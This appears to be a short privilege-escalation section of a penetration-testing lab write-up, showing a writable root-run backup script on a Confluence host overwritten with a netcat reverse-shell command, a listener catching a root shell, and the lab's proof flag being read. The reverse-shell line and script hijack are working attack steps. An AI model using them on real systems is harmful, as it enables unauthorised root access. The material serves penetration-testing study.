Priv Esc

/opt/atlassian/confluence/confluence/WEB-INF/

Ran pspy and found the following

confluence@flu:/home/confluence$ echo /dev/shm/nc 192.168.45.239 1337 -e /bin/bash > /opt/log-backup.sh

❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.236.41] 54070
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@flu:~# cat /root/proof.txt
cat /root/proof.txt
9673162178496b076ae9887c0e69f5f0
root@flu:~# ip addr
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:bf:a5:73 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.236.41/24 brd 192.168.236.255 scope global ens160
       valid_lft forever preferred_lft forever

PreviousEnumeration NextCredentials / Notes / LL

Last updated 4 months ago